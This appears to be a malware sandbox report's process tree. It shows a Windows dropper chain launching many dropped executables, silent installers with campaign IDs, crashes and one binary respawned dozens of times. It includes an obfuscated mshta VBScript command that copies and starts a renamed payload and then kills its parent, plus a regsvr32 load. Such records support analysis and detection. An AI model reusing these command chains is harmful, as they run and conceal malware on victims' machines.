"C:\Users\Admin\AppData\Local\Temp\6a-08fd6-7fe-6b992-3f40dd4bd78e8\Xydisagavi.exe"
8⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5552

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5hbzxrta.thq\GcleanerEU.exe /eufive & exit
9⤵
PID:2180

C:\Users\Admin\AppData\Local\Temp\5hbzxrta.thq\GcleanerEU.exe
C:\Users\Admin\AppData\Local\Temp\5hbzxrta.thq\GcleanerEU.exe /eufive
10⤵
- Executes dropped EXE
PID:5972

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5972 -s 276
11⤵
- Program crash
PID:5968

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lcupvnp1.pao\installer.exe /qn CAMPAIGN="654" & exit
9⤵
PID:6060

C:\Users\Admin\AppData\Local\Temp\lcupvnp1.pao\installer.exe
C:\Users\Admin\AppData\Local\Temp\lcupvnp1.pao\installer.exe /qn CAMPAIGN="654"
10⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4356

C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\lcupvnp1.pao\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\lcupvnp1.pao\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1630560308 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
11⤵
PID:5488

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wc1knklz.wa2\anyname.exe & exit
9⤵
PID:5732

C:\Users\Admin\AppData\Local\Temp\wc1knklz.wa2\anyname.exe
C:\Users\Admin\AppData\Local\Temp\wc1knklz.wa2\anyname.exe
10⤵
- Executes dropped EXE
PID:5884

C:\Users\Admin\AppData\Local\Temp\wc1knklz.wa2\anyname.exe
"C:\Users\Admin\AppData\Local\Temp\wc1knklz.wa2\anyname.exe" -u
11⤵
- Executes dropped EXE
PID:6056

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0ta1lm4s.elf\BsInstFile.exe & exit
9⤵
PID:4896

C:\Users\Admin\AppData\Local\Temp\0ta1lm4s.elf\BsInstFile.exe
C:\Users\Admin\AppData\Local\Temp\0ta1lm4s.elf\BsInstFile.exe
10⤵
PID:1656

C:\Users\Admin\AppData\Roaming\8446919.exe
"C:\Users\Admin\AppData\Roaming\8446919.exe"
11⤵
- Executes dropped EXE
PID:2976

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2976 -s 2236
12⤵
- Program crash
PID:5052

C:\Users\Admin\AppData\Roaming\7470346.exe
"C:\Users\Admin\AppData\Roaming\7470346.exe"
11⤵
PID:4180

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3br4mwcq.dz0\askinstall52.exe & exit
9⤵
PID:1796

C:\Users\Admin\AppData\Local\Temp\3br4mwcq.dz0\askinstall52.exe
C:\Users\Admin\AppData\Local\Temp\3br4mwcq.dz0\askinstall52.exe
10⤵
PID:3176

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3176 -s 1820
11⤵
- Program crash
PID:5024

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lfrspp3h.ytz\cleanpro13.exe & exit
9⤵
PID:2184

C:\Users\Admin\AppData\Local\Temp\lfrspp3h.ytz\cleanpro13.exe
C:\Users\Admin\AppData\Local\Temp\lfrspp3h.ytz\cleanpro13.exe
10⤵
PID:5352

C:\Users\Admin\Documents\3PSBuqBGTndjarSBzHYWJgx8.exe
"C:\Users\Admin\Documents\3PSBuqBGTndjarSBzHYWJgx8.exe"
11⤵
PID:1900

C:\Users\Admin\Documents\n8r0iSjpJwRbJ4CZRQpiuYz0.exe
"C:\Users\Admin\Documents\n8r0iSjpJwRbJ4CZRQpiuYz0.exe"
11⤵
PID:2340

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2340 -s 280
12⤵
- Program crash
PID:2056

C:\Users\Admin\Documents\qiCrFAFRwJBIJwCIFBi2lJr4.exe
"C:\Users\Admin\Documents\qiCrFAFRwJBIJwCIFBi2lJr4.exe"
11⤵
PID:2264

C:\Users\Admin\Documents\xCZ5B9BGcaWSqPIDhW_2iHAE.exe
"C:\Users\Admin\Documents\xCZ5B9BGcaWSqPIDhW_2iHAE.exe"
11⤵
PID:1800

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbScRIpt: CloSE ( CReATEobJECT ( "WscrIpt.SheLL").Run( "cmD.exe /Q /c TYPE ""C:\Users\Admin\Documents\xCZ5B9BGcaWSqPIDhW_2iHAE.exe"" > X4d4XArNWDu.eXE&& StArt X4D4XarNWDu.Exe -PXPoqL0iOUHHP7hXFattB5ZvsV & if """"== """" for %A IN (""C:\Users\Admin\Documents\xCZ5B9BGcaWSqPIDhW_2iHAE.exe"" ) do taskkill /f -im ""%~nxA"" " , 0, trUE ) )
12⤵
PID:6200

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /Q /c TYPE "C:\Users\Admin\Documents\xCZ5B9BGcaWSqPIDhW_2iHAE.exe"> X4d4XArNWDu.eXE&& StArt X4D4XarNWDu.Exe -PXPoqL0iOUHHP7hXFattB5ZvsV &if ""== "" for %A IN ("C:\Users\Admin\Documents\xCZ5B9BGcaWSqPIDhW_2iHAE.exe" ) do taskkill /f -im "%~nxA"
13⤵
PID:6688

C:\Users\Admin\AppData\Local\Temp\X4d4XArNWDu.eXE
X4D4XarNWDu.Exe -PXPoqL0iOUHHP7hXFattB5ZvsV
14⤵
PID:6412

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbScRIpt: CloSE ( CReATEobJECT ( "WscrIpt.SheLL").Run( "cmD.exe /Q /c TYPE ""C:\Users\Admin\AppData\Local\Temp\X4d4XArNWDu.eXE"" > X4d4XArNWDu.eXE&& StArt X4D4XarNWDu.Exe -PXPoqL0iOUHHP7hXFattB5ZvsV & if ""-PXPoqL0iOUHHP7hXFattB5ZvsV ""== """" for %A IN (""C:\Users\Admin\AppData\Local\Temp\X4d4XArNWDu.eXE"" ) do taskkill /f -im ""%~nxA"" " , 0, trUE ) )
15⤵
PID:2800

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /Q /c TYPE "C:\Users\Admin\AppData\Local\Temp\X4d4XArNWDu.eXE"> X4d4XArNWDu.eXE&& StArt X4D4XarNWDu.Exe -PXPoqL0iOUHHP7hXFattB5ZvsV &if "-PXPoqL0iOUHHP7hXFattB5ZvsV "== "" for %A IN ("C:\Users\Admin\AppData\Local\Temp\X4d4XArNWDu.eXE" ) do taskkill /f -im "%~nxA"
16⤵
PID:5672

C:\Windows\SysWOW64\regsvr32.exe
"C:\Windows\System32\regsvr32.exe" -S fOUT6o7J.Mj
15⤵
PID:2012

C:\Windows\SysWOW64\taskkill.exe
taskkill /f -im "xCZ5B9BGcaWSqPIDhW_2iHAE.exe"
14⤵
- Kills process with taskkill
PID:6084

C:\Users\Admin\Documents\zzRIYtYG4ttMW1yUpSvh81zH.exe
"C:\Users\Admin\Documents\zzRIYtYG4ttMW1yUpSvh81zH.exe"
11⤵
PID:5284

C:\Users\Admin\Documents\l0BGeAte0WBq3zjQ_llxqNAK.exe
"C:\Users\Admin\Documents\l0BGeAte0WBq3zjQ_llxqNAK.exe"
11⤵
PID:5520

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5520 -s 272
12⤵
- Program crash
PID:5868

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
"C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe"
11⤵
PID:1032

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:6900

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:7092

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:6612

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:720

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:6556

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:6708

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:7788

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:7812

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:7832

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:5408

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:4380

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:7348

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:8748

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:5676

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:8196

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:6604

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:9472

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:9332

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:10180

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:5180

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:9988

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:7032

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:6496

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:6964

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:3132

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:10344

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:10996

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:10596

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:10968

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:11168

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:3872

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:4284

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:11868

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:3872

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:11952

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:12060

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:6260

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:11488

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:9204

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:8228

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:6716

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:12744

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:12436

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:13252

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:9212

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:10068

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:13100

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:13504

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:14260

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:796

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:1068

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:13796

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:5140

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:6820

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:10404

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:14464

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:15056

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:13548

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:15180

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:15324

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:15040

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:15160

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:15260

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:14376

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:15556

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:16256

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:15512

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:16172

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:4660

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:2968

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:344

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:15408

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:16876

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:16160

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:11568

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:16892

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:15544

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:17808

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:17204

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:16776

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:18344

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:5052

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:17540

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 17540 -s 28
13⤵
- Program crash
PID:3060

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:18948

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:10584

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:19068

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:14100

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:15608

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:16232

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:784

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:11468

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:8472

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:14100

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:19936

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:14852

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:20352

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:13444

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:1568

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:17084

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 17084 -s 28
13⤵
- Program crash
PID:20624

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:19916

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:20668

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:10004

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:20136

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:20704

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:21432

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:13976

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:20616

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:5044

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:7576

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:22172

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:18984

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:22884

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:932

